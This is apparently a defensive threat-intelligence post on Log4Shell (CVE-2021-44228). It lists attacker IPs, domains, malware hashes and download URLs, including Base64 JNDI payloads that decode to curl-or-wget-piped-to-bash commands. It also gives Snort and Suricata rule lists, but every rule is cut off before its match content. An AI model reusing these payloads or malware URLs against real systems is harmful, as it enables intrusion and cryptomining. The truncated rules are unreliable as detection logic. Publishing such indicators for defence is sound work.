For background on Log4Shell (CVE-2021-44228), see the earlier articles:
Attack source IP addresses
Source IPs observed attempting the Apache Log4j RCE; a large share of them are Tor nodes.
1.116.59.211
1.14.17.89
103.103.0.141
103.103.0.142
103.214.5.13
104.244.72.115
104.244.72.129
104.244.72.136
104.244.72.7
104.244.73.126
104.244.73.43
104.244.73.85
104.244.73.93
104.244.74.211
104.244.74.55
104.244.74.57
104.244.75.225
104.244.75.74
104.244.76.13
104.244.76.170
104.244.76.173
104.244.76.44
104.244.77.139
104.244.77.235
104.244.78.213
104.244.79.6
107.189.1.160
107.189.1.178
107.189.10.137
107.189.10.143
107.189.11.153
107.189.12.135
107.189.13.143
107.189.14.182
107.189.14.76
107.189.14.98
107.189.28.100
107.189.28.241
107.189.29.107
107.189.29.41
107.189.3.244
107.189.31.195
107.189.31.241
107.189.8.65
109.237.96.124
109.70.100.22
109.70.100.23
109.70.100.25
109.70.100.26
109.70.100.27
109.70.100.31
109.70.100.34
109.70.100.36
116.24.67.213
121.4.56.143
121.5.219.20
122.161.50.23
128.31.0.13
133.18.201.195
134.122.34.28
135.148.43.32
137.184.102.82
137.184.104.73
137.184.106.119
137.184.28.58
137.184.99.8
138.68.167.19
139.59.8.39
139.59.97.205
140.246.171.141
142.93.151.166
142.93.34.250
143.110.221.204
143.198.32.72
143.198.45.117
145.220.24.19
146.56.131.161
147.182.131.229
147.182.150.124
147.182.154.100
147.182.167.165
147.182.169.254
147.182.198.103
147.182.215.36
147.182.219.9
150.158.189.96
151.115.60.113
151.80.148.159
152.89.239.12
154.39.255.195
154.94.7.88
157.230.32.67
157.245.109.75
159.203.8.145
159.223.9.17
159.65.155.208
159.65.194.103
159.65.3.102
159.65.58.66
161.35.119.60
162.142.125.193
162.142.125.194
162.142.125.195
162.142.125.196
162.142.125.42
162.142.125.43
162.142.125.44
162.142.125.58
162.142.125.59
162.142.125.60
162.247.74.201
162.247.74.202
162.247.74.206
162.247.74.27
162.247.74.7
162.255.202.246
163.172.157.143
163.172.213.212
164.90.199.216
166.70.207.2
167.248.133.113
167.248.133.114
167.248.133.115
167.248.133.116
167.248.133.41
167.248.133.42
167.248.133.43
167.248.133.44
167.248.133.57
167.248.133.58
167.248.133.59
167.248.133.60
167.71.13.196
167.94.138.113
167.94.138.114
167.94.138.115
167.94.138.116
167.94.138.41
167.94.138.42
167.94.138.43
167.94.138.44
167.94.138.57
167.94.138.58
167.94.138.59
167.94.138.60
167.94.145.60
167.99.164.201
167.99.172.213
167.99.172.58
170.210.45.163
171.25.193.20
171.25.193.25
171.25.193.77
171.25.193.78
172.106.17.218
175.6.210.66
176.10.104.240
176.10.99.200
178.17.170.135
178.17.170.23
178.17.171.102
178.17.174.14
178.176.202.121
178.176.203.190
178.20.55.16
178.62.79.49
179.43.187.138
18.27.197.252
180.149.231.245
181.214.39.2
185.10.68.168
185.100.86.128
185.100.87.139
185.100.87.174
185.100.87.202
185.100.87.41
185.107.47.171
185.107.47.215
185.107.70.56
185.129.61.1
185.129.61.4
185.130.44.108
185.14.97.147
185.165.169.18
185.220.100.240
185.220.100.241
185.220.100.242
185.220.100.243
185.220.100.244
185.220.100.245
185.220.100.246
185.220.100.247
185.220.100.248
185.220.100.249
185.220.100.250
185.220.100.251
185.220.100.252
185.220.100.253
185.220.100.254
185.220.100.255
185.220.101.1
185.220.101.10
185.220.101.128
185.220.101.129
185.220.101.131
185.220.101.132
185.220.101.133
185.220.101.134
185.220.101.135
185.220.101.136
185.220.101.137
185.220.101.138
185.220.101.139
185.220.101.14
185.220.101.140
185.220.101.141
185.220.101.142
185.220.101.143
185.220.101.144
185.220.101.145
185.220.101.146
185.220.101.147
185.220.101.148
185.220.101.149
185.220.101.150
185.220.101.151
185.220.101.152
185.220.101.153
185.220.101.154
185.220.101.155
185.220.101.156
185.220.101.157
185.220.101.158
185.220.101.159
185.220.101.16
185.220.101.160
185.220.101.161
185.220.101.162
185.220.101.163
185.220.101.164
185.220.101.165
185.220.101.166
185.220.101.167
185.220.101.168
185.220.101.169
185.220.101.170
185.220.101.171
185.220.101.172
185.220.101.173
185.220.101.174
185.220.101.175
185.220.101.176
185.220.101.177
185.220.101.178
185.220.101.179
185.220.101.180
185.220.101.181
185.220.101.182
185.220.101.183
185.220.101.184
185.220.101.185
185.220.101.186
185.220.101.187
185.220.101.188
185.220.101.189
185.220.101.19
185.220.101.190
185.220.101.191
185.220.101.2
185.220.101.21
185.220.101.3
185.220.101.32
185.220.101.33
185.220.101.34
185.220.101.35
185.220.101.36
185.220.101.37
185.220.101.38
185.220.101.39
185.220.101.40
185.220.101.41
185.220.101.42
185.220.101.43
185.220.101.44
185.220.101.45
185.220.101.46
185.220.101.47
185.220.101.48
185.220.101.49
185.220.101.50
185.220.101.51
185.220.101.52
185.220.101.53
185.220.101.54
185.220.101.55
185.220.101.56
185.220.101.57
185.220.101.58
185.220.101.59
185.220.101.60
185.220.101.61
185.220.101.62
185.220.101.63
185.220.101.7
185.220.101.9
185.220.102.241
185.220.102.242
185.220.102.243
185.220.102.245
185.220.102.246
185.220.102.249
185.220.102.250
185.220.102.252
185.220.102.253
185.220.102.254
185.220.102.4
185.220.102.6
185.220.102.7
185.220.102.8
185.220.103.117
185.220.103.119
185.220.103.4
185.220.103.5
185.220.103.7
185.220.103.8
185.232.23.46
185.236.200.117
185.38.175.130
185.38.175.131
185.38.175.132
185.4.132.183
185.56.80.65
185.83.214.69
188.120.246.215
188.166.122.43
188.166.223.38
188.166.225.104
188.166.48.55
188.166.74.97
188.166.92.228
191.232.38.25
192.160.102.169
192.42.116.19
192.81.130.207
192.99.152.200
193.110.95.34
193.189.100.195
193.189.100.196
193.189.100.201
193.189.100.202
193.189.100.203
193.218.118.183
193.218.118.231
193.239.232.101
193.239.232.102
193.31.24.154
194.135.33.152
194.163.133.36
194.163.45.31
194.48.199.78
195.123.247.209
195.176.3.19
195.176.3.24
195.19.192.26
195.206.105.217
195.251.41.139
195.254.135.76
197.246.171.83
198.144.121.43
198.96.155.3
198.98.51.189
198.98.57.191
198.98.57.207
198.98.60.19
199.195.250.77
199.195.253.162
199.217.117.92
199.249.230.110
199.249.230.158
20.205.104.227
20.71.156.146
204.8.156.142
205.185.115.217
205.185.115.45
205.185.117.149
205.185.126.167
205.185.127.35
206.189.20.141
209.127.17.234
209.127.17.242
209.141.34.232
209.141.36.206
209.141.41.103
209.141.45.189
209.141.45.227
209.141.49.232
211.154.194.21
212.109.197.1
212.192.216.30
212.192.246.95
212.193.57.225
212.47.237.67
213.202.216.189
213.61.215.54
213.95.149.22
216.218.134.12
221.199.187.100
23.120.182.121
23.129.64.131
23.129.64.132
23.129.64.133
23.129.64.135
23.129.64.137
23.129.64.139
23.129.64.140
23.129.64.141
23.129.64.145
23.129.64.146
23.129.64.148
23.129.64.149
23.154.177.2
23.154.177.4
23.154.177.7
23.160.193.176
23.183.83.71
23.184.48.209
3.94.114.30
31.42.184.34
31.42.186.101
35.76.31.198
37.120.232.51
37.123.163.58
37.19.212.104
37.228.129.109
45.12.134.108
45.129.56.200
45.13.104.179
45.130.229.168
45.137.184.31
45.137.21.9
45.15.16.70
45.153.160.130
45.153.160.131
45.153.160.133
45.153.160.134
45.153.160.135
45.153.160.136
45.153.160.138
45.153.160.140
45.153.160.2
45.154.255.147
45.155.205.233
45.61.185.54
45.61.186.225
46.105.95.220
46.166.139.111
46.173.218.146
46.182.21.248
46.4.51.212
47.254.127.78
5.157.38.50
5.182.210.216
5.183.209.217
5.199.143.202
5.2.70.140
5.2.72.73
51.15.180.36
51.15.43.205
51.15.59.15
51.15.76.60
51.255.106.85
51.75.161.78
51.77.52.216
54.173.99.121
60.31.180.149
61.19.25.207
62.102.148.68
62.102.148.69
62.210.130.250
62.76.41.46
64.113.32.29
66.220.242.222
68.183.198.247
68.183.44.143
68.79.17.59
72.223.168.73
79.146.170.248
80.71.158.44
81.17.18.59
81.17.18.60
81.17.18.61
81.17.18.62
82.221.131.71
85.93.218.204
87.118.110.27
88.80.20.86
89.163.154.91
89.163.252.230
89.163.252.30
89.249.63.3
89.35.30.236
91.203.5.146
91.219.237.21
92.223.89.187
92.242.40.21
94.142.241.194
94.230.208.147
95.214.54.97
128.199.15.215
128.199.222.221
134.209.24.42
134.209.82.14
137.184.98.176
138.197.106.234
138.197.108.154
138.197.167.229
138.197.193.220
138.197.216.230
138.197.72.76
138.197.9.239
138.68.155.222
138.68.250.214
139.59.101.242
139.59.103.254
139.59.108.31
139.59.163.74
139.59.182.104
139.59.188.119
142.93.157.150
143.110.221.219
143.198.180.150
143.198.183.66
147.182.179.141
147.182.187.229
147.182.216.21
157.245.129.50
159.203.187.141
159.203.45.181
159.203.58.73
159.223.42.182
159.223.61.102
159.89.115.238
159.89.122.19
159.89.133.216
159.89.146.147
159.89.150.150
159.89.154.102
159.89.154.185
159.89.154.64
159.89.154.77
159.89.48.173
159.89.94.219
161.35.155.230
161.35.156.13
164.92.254.33
165.22.201.45
165.227.32.109
165.227.37.189
165.232.80.166
165.232.80.22
165.232.84.226
165.232.84.228
167.172.94.250
167.99.172.99
167.99.186.227
167.99.204.151
167.99.221.217
167.99.221.249
167.99.36.245
167.99.88.151
174.138.6.128
178.128.226.212
178.128.232.114
178.62.23.146
178.62.32.211
188.166.102.47
188.166.105.150
188.166.45.93
188.166.76.204
188.166.86.206
46.101.223.115
51.195.45.190
64.227.67.110
67.205.170.85
68.183.192.239
68.183.198.36
68.183.207.73
68.183.33.144
68.183.35.171
68.183.36.244
68.183.41.150
Attacker server/domain addresses and hash values

ioc_category ioc
DOMAIN bvprzqhoz7j2ltin.onion.ly
DOMAIN bvprzqhoz7j2ltin.onion.ws
DOMAIN bvprzqhoz7j2ltin.tor2web.su
DOMAIN log.exposedbotnets.ru
DOMAIN nazi.uy
HASH 0bb39ba78fc976edb9c26de1cecd60eb
HASH 1348a00488a5b3097681b6463321d84c
HASH 1fe52c0b0139660b2335dd7b7c12ea05
HASH 23b317600f4d82ea58c6b39b6eb5a67c
HASH 2615ebcd4c82d8822ce0b58725938cc6
HASH 40e3b969906c1a3315e821a8461216bb
HASH 6d275af23910c5a31b2d9684bbb9c6f3
HASH 7b72cf30ac42c20f0a14b0b87425c00a
HASH 81fbe69a36650504b88756074a36c183
HASH 95d9a068529dd2ea4bb4bef644f5c4f5
HASH cf2ce888781958e929be430de173a0f8
HASH d20478a01344026a0ecd60b0b29e9bc1
HASH f14019c55e7ce19d93838a4b2f6aec12
HASH 0579a8907f34236b754b07331685d79e
HASH 07b7746b922cf7d7fa821123a226ed36
HASH dbc9125192bd1994cbb764f577ba5dda
HASH 648effa354b3cbaad87b45f48d59c616
HASH ccef46c7edf9131ccffc47bd69eb743b
IP_PORT 110.42.239.3:80
IP_PORT 114.132.231.19:80
IP_PORT 121.41.109.54:2204
IP_PORT 159.89.182.117:80
IP_PORT 18.228.7.109:80
IP_PORT 210.141.105.67:80
IP_PORT 45.130.229.168:9999
SLD *.exposedbotnets.ru
SLD *.nmsl.run
SLD *.viperdns.xyz
SLD *.wdnmdnmsl.xyz
URL http[:]//110.42.239.3/2.hta
URL http[:]//114.132.231.19/0.hta
URL http[:]//114.132.231.19/OK1.hta
URL http[:]//114.132.231.19/hfs.exe
URL http[:]//114.132.231.19/2.hta
URL http[:]//138.197.206.223/.x/xmra64
URL http[:]//159.89.182.117/wp-content/themes/twentyseventeen/ldm
URL http[:]//18.228.7.109/.log/pty3;
URL http[:]//18.228.7.109/.log/pty2;
URL http[:]//18.228.7.109/.log/log
URL http[:]//18.228.7.109/.log/pty4;
URL http[:]//18.228.7.109/.log/pty5;
URL http[:]//18.228.7.109/.log/pty1;
URL http[:]//18.228.7.109/.log/pty2
URL http[:]//18.228.7.109/.log/pty5
URL http[:]//18.228.7.109/.log/pty3
URL http[:]//18.228.7.109/.log/
URL http[:]//18.228.7.109/.log/pty1
URL http[:]//18.228.7.109/.log/pty4
URL http[:]//210.141.105.67/wp-content/themes/twentythirteen/m8
URL http[:]//34.221.40.237/.x/
URL http[:]//45.130.229.168:9999/Exploit.class
URL http[:]//62.210.130.250/web/admin/x86
URL http[:]//62.210.130.250/lh.sh
URL http[:]//62.210.130.250/web/admin/x86_g
URL http[:]//62.210.130.250/web/admin/x86_64
URL http[:]//62.210.130.250/web/admin/
URL http[:]//62.210.130.250/web/admin/x86
URL http[:]//62.210.130.250/web/admin/x86_64
URL http[:]//62.210.130.250/web/admin/x86_g
URL 185.154.53.140:80
URL http[:]//185.154.53.140/mg
URL http[:]//185.154.53.140/o
URL http[:]//185.154.53.140/s
URL http[:]//185.154.53.140/get
URL http[:]//185.154.53.140/ms
URL http[:]//138.197.206.223/.x/xmra64
URL http[:]//138.197.206.223/.x/xmra32
URL http[:]//18.228.7.109/.log/pty1
URL http[:]//18.228.7.109/.log/pty4
URL http[:]//210.141.105.67/wp-content/themes/twentythirteen/m8
URL http[:]//18.228.7.109/.log/pty2
URL http[:]//18.228.7.109/.log/pty3
URL http[:]//18.228.7.109/.log/pty5
URL http[:]//159.89.182.117/wp-content/themes/twentyseventeen/ldm
URL http[:]//18.228.7.109/.log/log
URL http[:]//82.118.18.201/cron.sh
URL http[:]//92.242.40.21/lh2.sh
URL http[:]//185.191.32.198/lh.sh
URL http[:]//82.118.18.201/curl-amd64
URL http[:]//82.118.18.201/libsystem.so
URL http[:]//82.118.18.201/kinsing
URL http[:]//82.118.18.201/lh.sh
URL http[:]//62.210.130.250/web/admin/x86_64
URL http[:]//62.210.130.250/lh.sh
URL http[:]//80.71.158.12/libsystem.so
URL http[:]//80.71.158.12/curl-amd64
URL http[:]//80.71.158.12/lh.sh
URL http[:]//185.191.32.198/unk.sh
URL http[:]//45.137.155.55/cron.sh
URL http[:]//185.191.32.198/ex.sh
URL http[:]//45.137.155.55/ex.sh
URL http[:]//62.210.130.250/web/admin/x86
URL http[:]//62.210.130.250/web/admin/x86_g
URL http[:]//62.210.130.250/web/admin/x86_64
URL http[:]//80.71.158.12/kinsing
URL http[:]//80.71.158.12/curl-amd64
URL http[:]//92.242.40.21/kinsing
URL http[:]//92.242.40.21/curl-amd64
URL http[:]//45.137.155.55/kinsing
URL http[:]//195.19.192.28/kinsing
URL http[:]//185.191.32.198/lh.sh
URL http[:]//80.71.158.44/lh.sh
URL http[:]//62.210.130.250/lh.sh
URL http[:]//92.242.40.21/lh.sh
URL http[:]//92.242.40.21/lh2.sh
HASH 07b7746b922cf7d7fa821123a226ed36
HASH 0e1a1382d4fd420f8a5ae1d88b3085e7
HASH 40e3b969906c1a3315e821a8461216bb
HASH 648effa354b3cbaad87b45f48d59c616
URL http[:]//45.130.229.168:1389/Exploit
IP_PORT 45.130.229.168:1389
IP_PORT 78.31.71.248:1389
URL http[:]//78.31.71.248:1389/lewrgz
URL http[:]//134.209.163.248/callback/
IP_PORT 45.155.205.233:5874
URL http[:]//45.155.205.233:5874/87.138.139.76:443
IP_PORT 45.155.205.233:12344
URL http[:]//45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ny4xMzguMTM5Ljc2OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC84Ny4xMzguMTM5Ljc2OjQ0Myl8YmFzaA==
URL http[:]//015ed9119662.bingsearchlib.com:39356/a
URL http[:]//32fce0c1f193.bingsearchlib.com:39356/a
URL http[:]//3be6466b6a20.bingsearchlib.com:39356/a
URL http[:]//6c8d7dd40593.bingsearchlib.com:39356/a
URL http[:]//7faf976567f5.bingsearchlib.com:39356/a
URL http[:]//e86eafcf9294.bingsearchlib.com:39356/a
SLD *.bingsearchlib.com
IP_PORT 80.71.158.12:5557
IP_PORT 45.155.205.233:12344
URL http[:]//80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=
URL http[:]//45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK
URL http[:]//80.71.158.12/lh.sh
IP_PORT 80.71.158.12:80
IP_PORT 45.155.205.233:5874
URL http[:]//62.210.130.250/web/admin/x86
URL http[:]//62.210.130.250/web/admin/x86_g
URL http[:]//62.210.130.250/web/admin/x86_64
URL http[:]//80.71.158.12/kinsing
URL http[:]//80.71.158.12/libsystem.so
URL http[:]//80.71.158.12/kinsing
URL http[:]//45.137.155.55/ex.sh
URL http[:]//45.137.155.55/kinsing
URL http[:]//80.71.158.12/libsystem.so
URL http[:]//80.71.158.12/kinsing
URL http[:]//80.71.158.12/Exploit69ogQNSQYz.class
HASH 3dfbe75871e218d08328a01c56e1bb42
HASH 648effa354b3cbaad87b45f48d59c616
HASH ccef46c7edf9131ccffc47bd69eb743b
HASH cf2ce888781958e929be430de173a0f8
HASH 40e3b969906c1a3315e821a8461216bb
HASH 6d275af23910c5a31b2d9684bbb9c6f3
HASH 1348a00488a5b3097681b6463321d84c
HASH d9f82dbf8733f15f97fb352467c9ab21
HASH ff171712ab8816f3d7600fe75bb18052
IP_PORT 45.83.193.150:1389
IP_PORT 31.220.58.29:80
URL http[:]//45.83.193.150:1389/Exploit
URL http[:]//31.220.58.29/Exploit.class
URL http[:]//172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd
IP_PORT 172.105.241.146:80
URL http[:]//18.228.7.109/.log/log
IP_PORT 18.228.7.109:80
HASH 1718956642fbd382e9cde0c6034f0e21
HASH c717c47941c150f867ce6a62ed0d2d35
HASH ceb9a55eaa71101f86b14c6b296066c9
HASH f6e51ea341570c6e9e4c97aee082822b
Snort detection rules
If you are not familiar with Snort, see the following article
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass (CVE-2021-44228)"; flow:established,to_server; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass (CVE-2021-44228)"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)"; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; flow:established,to_server; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; flow:established,to_server; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; content:" |
alert udp $HOME_NET any -> any 53 (msg:"ET POLICY dnslog .cn Observed in DNS Query"; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; flow:established,to_server; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; content:" |
alert udp $HOME_NET any -> any 53 (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain"; content:" |
Suricata detection rules
Suricata is an open-source intrusion detection system (IDS) and intrusion prevention system (IPS), developed by the Open Information Security Foundation (OISF). A beta version was released in December 2009 and the first standard release in July 2010.
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; flow:established,to_server; content:" |
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; flow:established,to_server; content:" |
alert udp $HOME_NET any -> any 53 (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain"; content:" |
alert udp $HOME_NET any -> any 53 (msg:"ET POLICY dnslog .cn Observed in DNS Query"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass (CVE-2021-44228)"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; content:" |
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; content:" |
Appendix: a Log4Shell vulnerability tester
https://log4shell.huntress.com/
Project address
Please credit the source and include a link when reposting.